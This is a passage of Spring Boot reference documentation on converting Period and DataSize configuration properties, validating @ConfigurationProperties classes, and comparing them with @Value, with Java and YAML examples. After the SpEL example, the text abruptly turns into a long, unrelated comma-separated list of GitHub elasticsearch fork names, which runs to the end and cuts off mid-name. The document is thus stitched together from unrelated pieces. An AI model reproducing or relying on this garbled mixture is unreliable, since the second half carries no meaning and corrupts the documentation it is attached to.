[[features.external-config.typesafe-configuration-properties.conversion.periods]]
===== Converting Periods
In addition to durations, Spring Boot can also work with the `java.time.Period` type.
The following formats can be used in application properties:

* A regular `int` representation (using days as the default unit unless a `@PeriodUnit` has been specified)
* The standard ISO-8601 format {java-api}/java/time/Period.html#parse-java.lang.CharSequence-[used by `java.time.Period`]
* A simpler format where the value and the unit pairs are coupled (`1y3d` means 1 year and 3 days)

The following units are supported with the simple format:

* `y` for years
* `m` for months
* `w` for weeks
* `d` for days

NOTE: The `java.time.Period` type never actually stores the number of weeks, it is a shortcut that means "`7 days`".


[[features.external-config.typesafe-configuration-properties.conversion.data-sizes]]
===== Converting Data Sizes
Spring Framework has a `DataSize` value type that expresses a size in bytes.
If you expose a `DataSize` property, the following formats in application properties are available:

* A regular `long` representation (using bytes as the default unit unless a `@DataSizeUnit` has been specified)
* A more readable format where the value and the unit are coupled (`10MB` means 10 megabytes)

Consider the following example:

[source,java,indent=0,subs="verbatim"]
----
include::{docs-java}/features/externalconfig/typesafeconfigurationproperties/conversion/datasizes/javabeanbinding/MyProperties.java[]
----

To specify a buffer size of 10 megabytes, `10` and `10MB` are equivalent.
A size threshold of 256 bytes can be specified as `256` or `256B`.

You can also use any of the supported units.
These are:

* `B` for bytes
* `KB` for kilobytes
* `MB` for megabytes
* `GB` for gigabytes
* `TB` for terabytes

The default unit is bytes and can be overridden using `@DataSizeUnit` as illustrated in the sample above.

If you prefer to use constructor binding, the same properties can be exposed, as shown in the following example:

[source,java,indent=0,subs="verbatim"]
----
include::{docs-java}/features/externalconfig/typesafeconfigurationproperties/conversion/datasizes/constructorbinding/MyProperties.java[]
----

TIP: If you are upgrading a `Long` property, make sure to define the unit (using `@DataSizeUnit`) if it is not bytes.
Doing so gives a transparent upgrade path while supporting a much richer format.
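Taken together, duration and data-size values might be configured like this sketch; the property keys mirror the prose above, but the exact names depend on the included listings:

[source,yaml,indent=0,subs="verbatim",configblocks]
----
my:
  session-timeout: "30s"
  read-timeout: "500ms"
  buffer-size: "10MB"
  size-threshold: "256B"
----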
[[features.external-config.typesafe-configuration-properties.validation]]
==== @ConfigurationProperties Validation
Spring Boot attempts to validate `@ConfigurationProperties` classes whenever they are annotated with Spring's `@Validated` annotation.
You can use JSR-303 `javax.validation` constraint annotations directly on your configuration class.
To do so, ensure that a compliant JSR-303 implementation is on your classpath and then add constraint annotations to your fields, as shown in the following example:

[source,java,indent=0,subs="verbatim"]
----
include::{docs-java}/features/externalconfig/typesafeconfigurationproperties/validate/MyProperties.java[]
----

TIP: You can also trigger validation by annotating the `@Bean` method that creates the configuration properties with `@Validated`.

To ensure that validation is always triggered for nested properties, even when no properties are found, the associated field must be annotated with `@Valid`.
The following example builds on the preceding `MyProperties` example:

[source,java,indent=0,subs="verbatim"]
----
include::{docs-java}/features/externalconfig/typesafeconfigurationproperties/validate/nested/MyProperties.java[]
----

You can also add a custom Spring `Validator` by creating a bean definition called `configurationPropertiesValidator`.
The `@Bean` method should be declared `static`.
The configuration properties validator is created very early in the application's lifecycle, and declaring the `@Bean` method as static lets the bean be created without having to instantiate the `@Configuration` class.
Doing so avoids any problems that may be caused by early instantiation.

TIP: The `spring-boot-actuator` module includes an endpoint that exposes all `@ConfigurationProperties` beans.
Point your web browser to `/actuator/configprops` or use the equivalent JMX endpoint.
See the "<<actuator#actuator.endpoints, Production ready features>>" section for details.


[[features.external-config.typesafe-configuration-properties.vs-value-annotation]]
==== @ConfigurationProperties vs. @Value
The `@Value` annotation is a core container feature, and it does not provide the same features as type-safe configuration properties.
The following table summarizes the features that are supported by `@ConfigurationProperties` and `@Value`:

[cols="4,2,2"]
|===
| Feature |`@ConfigurationProperties` |`@Value`

| <<features#features.external-config.typesafe-configuration-properties.relaxed-binding,Relaxed binding>>
| Yes
| Limited (see <<features#features.external-config.typesafe-configuration-properties.vs-value-annotation.note,note below>>)

| <<configuration-metadata#appendix.configuration-metadata,Meta-data support>>
| Yes
| No

| `SpEL` evaluation
| No
| Yes
|===

[[features.external-config.typesafe-configuration-properties.vs-value-annotation.note]]
NOTE: If you do want to use `@Value`, we recommend that you refer to property names using their canonical form (kebab-case using only lowercase letters).
This will allow Spring Boot to use the same logic as it does when relaxed binding `@ConfigurationProperties`.
For example, `@Value("$\{demo.item-price}")` will pick up `demo.item-price` and `demo.itemPrice` forms from the `application.properties` file, as well as `DEMO_ITEMPRICE` from the system environment.
If you used `@Value("$\{demo.itemPrice}")` instead, `demo.item-price` and `DEMO_ITEMPRICE` would not be considered.

If you define a set of configuration keys for your own components, we recommend you group them in a POJO annotated with `@ConfigurationProperties`.
Doing so will provide you with a structured, type-safe object that you can inject into your own beans.

`SpEL` expressions from <<features#features.external-config.files,application property files>> are not processed at the time of parsing these files and populating the environment.
However, it is possible to write a `SpEL` expression in `@Value`.
If the value of a property from an application property file is a `SpEL` expression, it will be evaluated when consumed through `@Value`.
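To illustrate that last point, consider the following sketch (the property name is hypothetical); the placeholder is resolved first, and the resulting `SpEL` expression is then evaluated at the injection point:

[source,java,indent=0,subs="verbatim"]
----
import org.springframework.beans.factory.annotation.Value;
import org.springframework.stereotype.Component;

@Component
public class SpelExample {

    // given demo.computed=#{2 * 60} in application.properties, the raw
    // string stays untouched in the Environment, but 120 is injected here
    @Value("${demo.computed}")
    private int computed;

}
----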
\/elasticsearch,kimimj\/elasticsearch,martinstuga\/elasticsearch,gfyoung\/elasticsearch,henakamaMSFT\/elasticsearch,s1monw\/elasticsearch,obourgain\/elasticsearch,phani546\/elasticsearch,elasticdog\/elasticsearch,Brijeshrpatel9\/elasticsearch,heng4fun\/elasticsearch,HonzaKral\/elasticsearch,MaineC\/elasticsearch,masaruh\/elasticsearch,LewayneNaidoo\/elasticsearch,onegambler\/elasticsearch,chirilo\/elasticsearch,amaliujia\/elasticsearch,liweinan0423\/elasticsearch,Microsoft\/elasticsearch,opendatasoft\/elasticsearch,glefloch\/elasticsearch,gmarz\/elasticsearch,EasonYi\/elasticsearch,ThiagoGarciaAlves\/elasticsearch,myelin\/elasticsearch,kcompher\/elasticsearch,Uiho\/elasticsearch,trangvh\/elasticsearch,JervyShi\/elasticsearch,liweinan0423\/elasticsearch,dataduke\/elasticsearch,dylan8902\/elasticsearch,mgalushka\/elasticsearch,artnowo\/elasticsearch,beiske\/elasticsearch,ivansun1010\/elasticsearch,glefloch\/elasticsearch,hafkensite\/elasticsearch,amaliujia\/elasticsearch,kkirsche\/elasticsearch,geidies\/elasticsearch,avikurapati\/elasticsearch,s1monw\/elasticsearch,masaruh\/elasticsearch,sjohnr\/elasticsearch,martinstuga\/elasticsearch,jimhooker2002\/elasticsearch,ckclark\/elasticsearch,strapdata\/elassandra,combinatorist\/elasticsearch,masaruh\/elasticsearch,jw0201\/elastic,Uiho\/elasticsearch,tahaemin\/elasticsearch,Fsero\/elasticsearch,alexshadow007\/elasticsearch,rlugojr\/elasticsearch,JackyMai\/elasticsearch,bestwpw\/elasticsearch,heng4fun\/elasticsearch,jbertouch\/elasticsearch,gmarz\/elasticsearch,apepper\/elasticsearch,slavau\/elasticsearch,kenshin233\/elasticsearch,baishuo\/elasticsearch_v2.1.0-baishuo,anti-social\/elasticsearch,iacdingping\/elasticsearch,mjason3\/elasticsearch,karthikjaps\/elasticsearch,Chhunlong\/elasticsearch,mnylen\/elasticsearch,lzo\/elasticsearch-1,18098924759\/elasticsearch,Clairebi\/ElasticsearchClone,opendatasoft\/elasticsearch,bawse\/elasticsearch,huypx1292\/elasticsearch,socialrank\/elasticsearch,bestwpw\/elasticsearch,kimimj\/elasticsearch,KimTaehee\/elasticsearch,nilabhsagar\/elasticsearch,wbowling\/elasticsearch,feiqitian\/elasticsearch,kevinkluge\/elasticsearch,tsohil\/elasticsearch,achow\/elasticsearch,infusionsoft\/elasticsearch,strapdata\/elassandra-test,iantruslove\/elasticsearch,mmaracic\/elasticsearch,tkssharma\/elasticsearch,naveenhooda2000\/elasticsearch,petabytedata\/elasticsearch,jimhooker2002\/elasticsearch,maddin2016\/elasticsearch,jchampion\/elasticsearch,mohit\/elasticsearch,MjAbuz\/elasticsearch,jchampion\/elasticsearch,jimczi\/elasticsearch,abibell\/elasticsearch,LewayneNaidoo\/elasticsearch,IanvsPoplicola\/elasticsearch,PhaedrusTheGreek\/elasticsearch,himanshuag\/elasticsearch,TonyChai24\/ESSource,javachengwc\/elasticsearch,fforbeck\/elasticsearch,qwerty4030\/elasticsearch,truemped\/elasticsearch,Brijeshrpatel9\/elasticsearch,slavau\/elasticsearch,tebriel\/elasticsearch,clintongormley\/elasticsearch,scottsom\/elasticsearch,diendt\/elasticsearch,hirdesh2008\/elasticsearch,AleksKochev\/elasticsearch,anti-social\/elasticsearch,NBSW\/elasticsearch,chirilo\/elasticsearch,Collaborne\/elasticsearch,wbowling\/elasticsearch,strapdata\/elassandra5-rc,mm0\/elasticsearch,wittyameta\/elasticsearch,lzo\/elasticsearch-1,dantuffery\/elasticsearch,gingerwizard\/elasticsearch,AshishThakur\/elasticsearch,drewr\/elasticsearch,jpountz\/elasticsearch,mbrukman\/elasticsearch,mkis-\/elasticsearch,zhiqinghuang\/elasticsearch,yynil\/elasticsearch,mjhennig\/elasticsearch,wangtuo\/elasticsearch,himanshuag\/elasticsearch,jbertouch\/elasticsearch,lzo\/elasticsearch
-1,wangyuxue\/elasticsearch,YosuaMichael\/elasticsearch,fred84\/elasticsearch,Rygbee\/elasticsearch,fekaputra\/elasticsearch,truemped\/elasticsearch,masterweb121\/elasticsearch,winstonewert\/elasticsearch,HonzaKral\/elasticsearch,lks21c\/elasticsearch,dantuffery\/elasticsearch,sauravmondallive\/elasticsearch,F0lha\/elasticsearch,AndreKR\/elasticsearch,codebunt\/elasticsearch,jbertouch\/elasticsearch,camilojd\/elasticsearch,zhiqinghuang\/elasticsearch,ydsakyclguozi\/elasticsearch,AshishThakur\/elasticsearch,mkis-\/elasticsearch,javachengwc\/elasticsearch,anti-social\/elasticsearch,nomoa\/elasticsearch,nrkkalyan\/elasticsearch,hechunwen\/elasticsearch,rhoml\/elasticsearch,episerver\/elasticsearch,vrkansagara\/elasticsearch,VukDukic\/elasticsearch,sdauletau\/elasticsearch,nezirus\/elasticsearch,xpandan\/elasticsearch,s1monw\/elasticsearch,artnowo\/elasticsearch,fekaputra\/elasticsearch,apepper\/elasticsearch,baishuo\/elasticsearch_v2.1.0-baishuo,Liziyao\/elasticsearch,caengcjd\/elasticsearch,khiraiwa\/elasticsearch,maddin2016\/elasticsearch,btiernay\/elasticsearch,Shekharrajak\/elasticsearch,pranavraman\/elasticsearch,awislowski\/elasticsearch,mcku\/elasticsearch,Fsero\/elasticsearch,hanst\/elasticsearch,diendt\/elasticsearch,snikch\/elasticsearch,a2lin\/elasticsearch,vietlq\/elasticsearch,chirilo\/elasticsearch,himanshuag\/elasticsearch,slavau\/elasticsearch,bestwpw\/elasticsearch,Collaborne\/elasticsearch,vroyer\/elasticassandra,markllama\/elasticsearch,khiraiwa\/elasticsearch,opendatasoft\/elasticsearch,Charlesdong\/elasticsearch,spiegela\/elasticsearch,nellicus\/elasticsearch,dylan8902\/elasticsearch,scottsom\/elasticsearch,kalburgimanjunath\/elasticsearch,chrismwendt\/elasticsearch,JSCooke\/elasticsearch,C-Bish\/elasticsearch,jchampion\/elasticsearch,qwerty4030\/elasticsearch,snikch\/elasticsearch,dpursehouse\/elasticsearch,codebunt\/elasticsearch,SergVro\/elasticsearch,javachengwc\/elasticsearch,beiske\/elasticsearch,shreejay\/elasticsearch,sneivandt\/elasticsearch,micpalmia\/elasticsearch,schonfeld\/elasticsearch,hirdesh2008\/elasticsearch,ZTE-PaaS\/elasticsearch,tkssharma\/elasticsearch,wuranbo\/elasticsearch,liweinan0423\/elasticsearch,jpountz\/elasticsearch,kalburgimanjunath\/elasticsearch,karthikjaps\/elasticsearch,ckclark\/elasticsearch,myelin\/elasticsearch,hydro2k\/elasticsearch,huypx1292\/elasticsearch,njlawton\/elasticsearch,markharwood\/elasticsearch,jeteve\/elasticsearch,xpandan\/elasticsearch,fooljohnny\/elasticsearch,JSCooke\/elasticsearch,sdauletau\/elasticsearch,lmtwga\/elasticsearch,andrejserafim\/elasticsearch,infusionsoft\/elasticsearch,henakamaMSFT\/elasticsearch,ThiagoGarciaAlves\/elasticsearch,geidies\/elasticsearch,kalburgimanjunath\/elasticsearch,sreeramjayan\/elasticsearch,ulkas\/elasticsearch,sjohnr\/elasticsearch,caengcjd\/elasticsearch,C-Bish\/elasticsearch,rmuir\/elasticsearch,nilabhsagar\/elasticsearch,avikurapati\/elasticsearch,LewayneNaidoo\/elasticsearch,yuy168\/elasticsearch,ivansun1010\/elasticsearch,heng4fun\/elasticsearch,sauravmondallive\/elasticsearch,fernandozhu\/elasticsearch,StefanGor\/elasticsearch,mohit\/elasticsearch,kimimj\/elasticsearch,jeteve\/elasticsearch,ouyangkongtong\/elasticsearch,janmejay\/elasticsearch,apepper\/elasticsearch,glefloch\/elasticsearch,C-Bish\/elasticsearch,ThiagoGarciaAlves\/elasticsearch,GlenRSmith\/elasticsearch,cnfire\/elasticsearch-1,xingguang2013\/elasticsearch,lmtwga\/elasticsearch,hechunwen\/elasticsearch,iamjakob\/elasticsearch,socialrank\/elasticsearch,s1monw\/elasticsearch,jbertouch\/elasticsearch,caengcjd\/e
lasticsearch,qwerty4030\/elasticsearch,vingupta3\/elasticsearch,zeroctu\/elasticsearch,vvcephei\/elasticsearch,Liziyao\/elasticsearch,rlugojr\/elasticsearch,achow\/elasticsearch,C-Bish\/elasticsearch,andrestc\/elasticsearch,Asimov4\/elasticsearch,zkidkid\/elasticsearch,jchampion\/elasticsearch,artnowo\/elasticsearch,kaneshin\/elasticsearch,mnylen\/elasticsearch,mgalushka\/elasticsearch,mjason3\/elasticsearch,hanswang\/elasticsearch,F0lha\/elasticsearch,Clairebi\/ElasticsearchClone,queirozfcom\/elasticsearch,hafkensite\/elasticsearch,mohit\/elasticsearch,slavau\/elasticsearch,alexshadow007\/elasticsearch,kenshin233\/elasticsearch,coding0011\/elasticsearch,mapr\/elasticsearch,qwerty4030\/elasticsearch,Shekharrajak\/elasticsearch,umeshdangat\/elasticsearch,micpalmia\/elasticsearch,nellicus\/elasticsearch,zeroctu\/elasticsearch,andrejserafim\/elasticsearch,PhaedrusTheGreek\/elasticsearch,LeoYao\/elasticsearch,SaiprasadKrishnamurthy\/elasticsearch,MisterAndersen\/elasticsearch,hydro2k\/elasticsearch,petabytedata\/elasticsearch,pablocastro\/elasticsearch,koxa29\/elasticsearch,fekaputra\/elasticsearch,xpandan\/elasticsearch,jw0201\/elastic,cwurm\/elasticsearch,myelin\/elasticsearch,pozhidaevak\/elasticsearch,likaiwalkman\/elasticsearch,strapdata\/elassandra5-rc,Asimov4\/elasticsearch,masterweb121\/elasticsearch,likaiwalkman\/elasticsearch,kevinkluge\/elasticsearch,amaliujia\/elasticsearch,pablocastro\/elasticsearch,vvcephei\/elasticsearch,kingaj\/elasticsearch,drewr\/elasticsearch,wimvds\/elasticsearch,ThalaivaStars\/OrgRepo1,wayeast\/elasticsearch,huypx1292\/elasticsearch,Chhunlong\/elasticsearch,mm0\/elasticsearch,tkssharma\/elasticsearch,hirdesh2008\/elasticsearch,LeoYao\/elasticsearch,andrestc\/elasticsearch,Shekharrajak\/elasticsearch,naveenhooda2000\/elasticsearch,easonC\/elasticsearch,yongminxia\/elasticsearch,awislowski\/elasticsearch,ImpressTV\/elasticsearch,overcome\/elasticsearch,yanjunh\/elasticsearch,rajanm\/elasticsearch,overcome\/elasticsearch,khiraiwa\/elasticsearch,sarwarbhuiyan\/elasticsearch,milodky\/elasticsearch,mjason3\/elasticsearch,mgalushka\/elasticsearch,ESamir\/elasticsearch,TonyChai24\/ESSource,chrismwendt\/elasticsearch,infusionsoft\/elasticsearch,vietlq\/elasticsearch,aglne\/elasticsearch,F0lha\/elasticsearch,polyfractal\/elasticsearch,nknize\/elasticsearch,pablocastro\/elasticsearch,Widen\/elasticsearch,brandonkearby\/elasticsearch,brandonkearby\/elasticsearch,TonyChai24\/ESSource,tebriel\/elasticsearch,Uiho\/elasticsearch,kingaj\/elasticsearch,awislowski\/elasticsearch,iamjakob\/elasticsearch,alexbrasetvik\/elasticsearch,pozhidaevak\/elasticsearch,YosuaMichael\/elasticsearch,cnfire\/elasticsearch-1,abibell\/elasticsearch,abibell\/elasticsearch,slavau\/elasticsearch,alexkuk\/elasticsearch,dylan8902\/elasticsearch,trangvh\/elasticsearch,dylan8902\/elasticsearch,rhoml\/elasticsearch,HarishAtGitHub\/elasticsearch,acchen97\/elasticsearch,schonfeld\/elasticsearch,lydonchandra\/elasticsearch,rmuir\/elasticsearch,vrkansagara\/elasticsearch,rmuir\/elasticsearch,koxa29\/elasticsearch,SergVro\/elasticsearch,Uiho\/elasticsearch,episerver\/elasticsearch,JackyMai\/elasticsearch,loconsolutions\/elasticsearch,jbertouch\/elasticsearch,sjohnr\/elasticsearch,rlugojr\/elasticsearch,JackyMai\/elasticsearch,thecocce\/elasticsearch,xuzha\/elasticsearch,wbowling\/elasticsearch,fekaputra\/elasticsearch,szroland\/elasticsearch,Rygbee\/elasticsearch,huanzhong\/elasticsearch,JervyShi\/elasticsearch,dpursehouse\/elasticsearch,MetSystem\/elasticsearch,sc0ttkclark\/elasticsearch,HarishAtGitHub\/e
lasticsearch,jaynblue\/elasticsearch,drewr\/elasticsearch,loconsolutions\/elasticsearch,truemped\/elasticsearch,likaiwalkman\/elasticsearch,a2lin\/elasticsearch,nilabhsagar\/elasticsearch,btiernay\/elasticsearch,nellicus\/elasticsearch,cnfire\/elasticsearch-1,winstonewert\/elasticsearch,JervyShi\/elasticsearch,lks21c\/elasticsearch,feiqitian\/elasticsearch,ThiagoGarciaAlves\/elasticsearch,knight1128\/elasticsearch,StefanGor\/elasticsearch,hirdesh2008\/elasticsearch,drewr\/elasticsearch,umeshdangat\/elasticsearch,rento19962\/elasticsearch,ZTE-PaaS\/elasticsearch,weipinghe\/elasticsearch,jprante\/elasticsearch,polyfractal\/elasticsearch,pritishppai\/elasticsearch,smflorentino\/elasticsearch,davidvgalbraith\/elasticsearch,javachengwc\/elasticsearch,Widen\/elasticsearch,winstonewert\/elasticsearch,sarwarbhuiyan\/elasticsearch,Ansh90\/elasticsearch,jaynblue\/elasticsearch,Flipkart\/elasticsearch,MisterAndersen\/elasticsearch,Rygbee\/elasticsearch,socialrank\/elasticsearch,Widen\/elasticsearch,combinatorist\/elasticsearch,fred84\/elasticsearch,dantuffery\/elasticsearch,cnfire\/elasticsearch-1,wangtuo\/elasticsearch,obourgain\/elasticsearch,ydsakyclguozi\/elasticsearch,girirajsharma\/elasticsearch,huanzhong\/elasticsearch,skearns64\/elasticsearch,janmejay\/elasticsearch,Widen\/elasticsearch,obourgain\/elasticsearch,amit-shar\/elasticsearch,bestwpw\/elasticsearch,Kakakakakku\/elasticsearch,abibell\/elasticsearch,Siddartha07\/elasticsearch,yongminxia\/elasticsearch,avikurapati\/elasticsearch,springning\/elasticsearch,fforbeck\/elasticsearch,wayeast\/elasticsearch,mortonsykes\/elasticsearch,lightslife\/elasticsearch,mapr\/elasticsearch,tsohil\/elasticsearch,apepper\/elasticsearch,strapdata\/elassandra,winstonewert\/elasticsearch,acchen97\/elasticsearch,weipinghe\/elasticsearch,sreeramjayan\/elasticsearch,xuzha\/elasticsearch,MaineC\/elasticsearch,strapdata\/elassandra5-rc,geidies\/elasticsearch,kubum\/elasticsearch,kkirsche\/elasticsearch,kaneshin\/elasticsearch,strapdata\/elassandra5-rc,pritishppai\/elasticsearch,spiegela\/elasticsearch,gmarz\/elasticsearch,apepper\/elasticsearch,glefloch\/elasticsearch,vroyer\/elassandra,kalimatas\/elasticsearch,sc0ttkclark\/elasticsearch,fekaputra\/elasticsearch,ZTE-PaaS\/elasticsearch,MaineC\/elasticsearch,chrismwendt\/elasticsearch,rajanm\/elasticsearch,dylan8902\/elasticsearch,ESamir\/elasticsearch,mnylen\/elasticsearch,springning\/elasticsearch,robin13\/elasticsearch,lchennup\/elasticsearch,jeteve\/elasticsearch,combinatorist\/elasticsearch,ckclark\/elasticsearch,brandonkearby\/elasticsearch,jimczi\/elasticsearch,petabytedata\/elasticsearch,yuy168\/elasticsearch,hirdesh2008\/elasticsearch,janmejay\/elasticsearch,Collaborne\/elasticsearch,winstonewert\/elasticsearch,mkis-\/elasticsearch,clintongormley\/elasticsearch,Charlesdong\/elasticsearch,fooljohnny\/elasticsearch,camilojd\/elasticsearch,schonfeld\/elasticsearch,AshishThakur\/elasticsearch,strapdata\/elassandra-test,markwalkom\/elasticsearch,strapdata\/elassandra-test,knight1128\/elasticsearch,awislowski\/elasticsearch,tebriel\/elasticsearch,yongminxia\/elasticsearch,karthikjaps\/elasticsearch,rajanm\/elasticsearch,hechunwen\/elasticsearch,trangvh\/elasticsearch,janmejay\/elasticsearch,strapdata\/elassandra-test,linglaiyao1314\/elasticsearch,Liziyao\/elasticsearch,golubev\/elasticsearch,KimTaehee\/elasticsearch,petabytedata\/elasticsearch,wuranbo\/elasticsearch,zkidkid\/elasticsearch,ydsakyclguozi\/elasticsearch,mcku\/elasticsearch,franklanganke\/elasticsearch,iacdingping\/elasticsearch,achow\/elasticsearch
,xuzha\/elasticsearch,tkssharma\/elasticsearch,PhaedrusTheGreek\/elasticsearch,tcucchietti\/elasticsearch,kevinkluge\/elasticsearch,beiske\/elasticsearch,mortonsykes\/elasticsearch,fforbeck\/elasticsearch,mapr\/elasticsearch,vrkansagara\/elasticsearch,tsohil\/elasticsearch,brandonkearby\/elasticsearch,coding0011\/elasticsearch,jw0201\/elastic,btiernay\/elasticsearch,pranavraman\/elasticsearch,Asimov4\/elasticsearch,knight1128\/elasticsearch,masaruh\/elasticsearch,kcompher\/elasticsearch,F0lha\/elasticsearch,martinstuga\/elasticsearch,scottsom\/elasticsearch,szroland\/elasticsearch,humandb\/elasticsearch,kcompher\/elasticsearch,wimvds\/elasticsearch,hafkensite\/elasticsearch,queirozfcom\/elasticsearch,dongjoon-hyun\/elasticsearch,jimhooker2002\/elasticsearch,wenpos\/elasticsearch,mjason3\/elasticsearch,masaruh\/elasticsearch,AndreKR\/elasticsearch,lightslife\/elasticsearch,linglaiyao1314\/elasticsearch,pritishppai\/elasticsearch,njlawton\/elasticsearch,markllama\/elasticsearch,Kakakakakku\/elasticsearch,kaneshin\/elasticsearch,lchennup\/elasticsearch,rento19962\/elasticsearch,mjhennig\/elasticsearch,ydsakyclguozi\/elasticsearch,yuy168\/elasticsearch,sauravmondallive\/elasticsearch,maddin2016\/elasticsearch,jimhooker2002\/elasticsearch,milodky\/elasticsearch,btiernay\/elasticsearch,snikch\/elasticsearch,Kakakakakku\/elasticsearch,lzo\/elasticsearch-1,polyfractal\/elasticsearch,lightslife\/elasticsearch,luiseduardohdbackup\/elasticsearch,ZTE-PaaS\/elasticsearch,kingaj\/elasticsearch,zkidkid\/elasticsearch,truemped\/elasticsearch,zeroctu\/elasticsearch,rhoml\/elasticsearch,ouyangkongtong\/elasticsearch,spiegela\/elasticsearch,springning\/elasticsearch,vrkansagara\/elasticsearch,Fsero\/elasticsearch,ricardocerq\/elasticsearch,kaneshin\/elasticsearch,wuranbo\/elasticsearch,Rygbee\/elasticsearch,jeteve\/elasticsearch,Liziyao\/elasticsearch,pozhidaevak\/elasticsearch,pablocastro\/elasticsearch,C-Bish\/elasticsearch,likaiwalkman\/elasticsearch,markwalkom\/elasticsearch,clintongormley\/elasticsearch,MetSystem\/elasticsearch,martinstuga\/elasticsearch,iamjakob\/elasticsearch,beiske\/elasticsearch,Collaborne\/elasticsearch,Flipkart\/elasticsearch,rajanm\/elasticsearch,tsohil\/elasticsearch,jango2015\/elasticsearch,andrestc\/elasticsearch,umeshdangat\/elasticsearch,mjhennig\/elasticsearch,kunallimaye\/elasticsearch,areek\/elasticsearch,springning\/elasticsearch,cnfire\/elasticsearch-1,luiseduardohdbackup\/elasticsearch,codebunt\/elasticsearch,uschindler\/elasticsearch,Uiho\/elasticsearch,springning\/elasticsearch,pozhidaevak\/elasticsearch,caengcjd\/elasticsearch,xingguang2013\/elasticsearch,ThalaivaStars\/OrgRepo1,elancom\/elasticsearch,rmuir\/elasticsearch,djschny\/elasticsearch,NBSW\/elasticsearch,wittyameta\/elasticsearch,thecocce\/elasticsearch,lightslife\/elasticsearch,queirozfcom\/elasticsearch,wittyameta\/elasticsearch,MisterAndersen\/elasticsearch,i-am-Nathan\/elasticsearch,rento19962\/elasticsearch,areek\/elasticsearch,camilojd\/elasticsearch,hirdesh2008\/elasticsearch,uschindler\/elasticsearch,MjAbuz\/elasticsearch,MetSystem\/elasticsearch,hydro2k\/elasticsearch,khiraiwa\/elasticsearch,jsgao0\/elasticsearch,overcome\/elasticsearch,aglne\/elasticsearch,martinstuga\/elasticsearch,uschindler\/elasticsearch,Shekharrajak\/elasticsearch,lmtwga\/elasticsearch,andrejserafim\/elasticsearch,mgalushka\/elasticsearch,i-am-Nathan\/elasticsearch,alexshadow007\/elasticsearch,rhoml\/elasticsearch,wenpos\/elasticsearch,xingguang2013\/elasticsearch,mbrukman\/elasticsearch,markharwood\/elasticsearch,dataduke\/e
lasticsearch,strapdata\/elassandra,brandonkearby\/elasticsearch,mmaracic\/elasticsearch,lydonchandra\/elasticsearch,strapdata\/elassandra5-rc,Widen\/elasticsearch,lks21c\/elasticsearch,Flipkart\/elasticsearch,Ansh90\/elasticsearch,polyfractal\/elasticsearch,jimhooker2002\/elasticsearch,davidvgalbraith\/elasticsearch,GlenRSmith\/elasticsearch,zkidkid\/elasticsearch,dpursehouse\/elasticsearch,mbrukman\/elasticsearch,socialrank\/elasticsearch,jprante\/elasticsearch,iacdingping\/elasticsearch,alexshadow007\/elasticsearch,dataduke\/elasticsearch,overcome\/elasticsearch,wittyameta\/elasticsearch,strapdata\/elassandra-test,jw0201\/elastic,ImpressTV\/elasticsearch,LeoYao\/elasticsearch,luiseduardohdbackup\/elasticsearch,amit-shar\/elasticsearch,episerver\/elasticsearch,markharwood\/elasticsearch,szroland\/elasticsearch,ivansun1010\/elasticsearch,JSCooke\/elasticsearch,infusionsoft\/elasticsearch,JSCooke\/elasticsearch,andrestc\/elasticsearch,Charlesdong\/elasticsearch,rmuir\/elasticsearch,szroland\/elasticsearch,yongminxia\/elasticsearch,ulkas\/elasticsearch,mapr\/elasticsearch,ThiagoGarciaAlves\/elasticsearch,mjhennig\/elasticsearch,humandb\/elasticsearch,chirilo\/elasticsearch,obourgain\/elasticsearch,sdauletau\/elasticsearch,vvcephei\/elasticsearch,yongminxia\/elasticsearch,baishuo\/elasticsearch_v2.1.0-baishuo,rento19962\/elasticsearch,skearns64\/elasticsearch,xuzha\/elasticsearch,kevinkluge\/elasticsearch,pablocastro\/elasticsearch,avikurapati\/elasticsearch,tahaemin\/elasticsearch,Rygbee\/elasticsearch,mm0\/elasticsearch,Brijeshrpatel9\/elasticsearch,SergVro\/elasticsearch,MichaelLiZhou\/elasticsearch,adrianbk\/elasticsearch,hanswang\/elasticsearch,njlawton\/elasticsearch,xingguang2013\/elasticsearch,mkis-\/elasticsearch,LeoYao\/elasticsearch,zkidkid\/elasticsearch,humandb\/elasticsearch,kcompher\/elasticsearch,camilojd\/elasticsearch,sjohnr\/elasticsearch,StefanGor\/elasticsearch,codebunt\/elasticsearch,Helen-Zhao\/elasticsearch,yuy168\/elasticsearch,vietlq\/elasticsearch,LeoYao\/elasticsearch,MichaelLiZhou\/elasticsearch,Liziyao\/elasticsearch,nellicus\/elasticsearch,glefloch\/elasticsearch,karthikjaps\/elasticsearch,hanst\/elasticsearch,jpountz\/elasticsearch,lmtwga\/elasticsearch,kubum\/elasticsearch,yuy168\/elasticsearch,gmarz\/elasticsearch,skearns64\/elasticsearch,ThiagoGarciaAlves\/elasticsearch,MetSystem\/elasticsearch,wimvds\/elasticsearch,micpalmia\/elasticsearch,drewr\/elasticsearch,Shekharrajak\/elasticsearch,janmejay\/elasticsearch,likaiwalkman\/elasticsearch,dantuffery\/elasticsearch,scorpionvicky\/elasticsearch,ulkas\/elasticsearch,zeroctu\/elasticsearch,linglaiyao1314\/elasticsearch,franklanganke\/elasticsearch,GlenRSmith\/elasticsearch,dataduke\/elasticsearch,luiseduardohdbackup\/elasticsearch,sscarduzio\/elasticsearch,fred84\/elasticsearch,golubev\/elasticsearch,humandb\/elasticsearch,andrestc\/elasticsearch,opendatasoft\/elasticsearch,MetSystem\/elasticsearch,Rygbee\/elasticsearch,dongjoon-hyun\/elasticsearch,Helen-Zhao\/elasticsearch,lks21c\/elasticsearch,kunallimaye\/elasticsearch,yanjunh\/elasticsearch,masterweb121\/elasticsearch,rlugojr\/elasticsearch,iamjakob\/elasticsearch,palecur\/elasticsearch,MetSystem\/elasticsearch,abibell\/elasticsearch,a2lin\/elasticsearch,koxa29\/elasticsearch,Charlesdong\/elasticsearch,kunallimaye\/elasticsearch,lydonchandra\/elasticsearch,combinatorist\/elasticsearch,loconsolutions\/elasticsearch,EasonYi\/elasticsearch,HarishAtGitHub\/elasticsearch,jaynblue\/elasticsearch,mmaracic\/elasticsearch,dpursehouse\/elasticsearch,liweinan0423\/elas
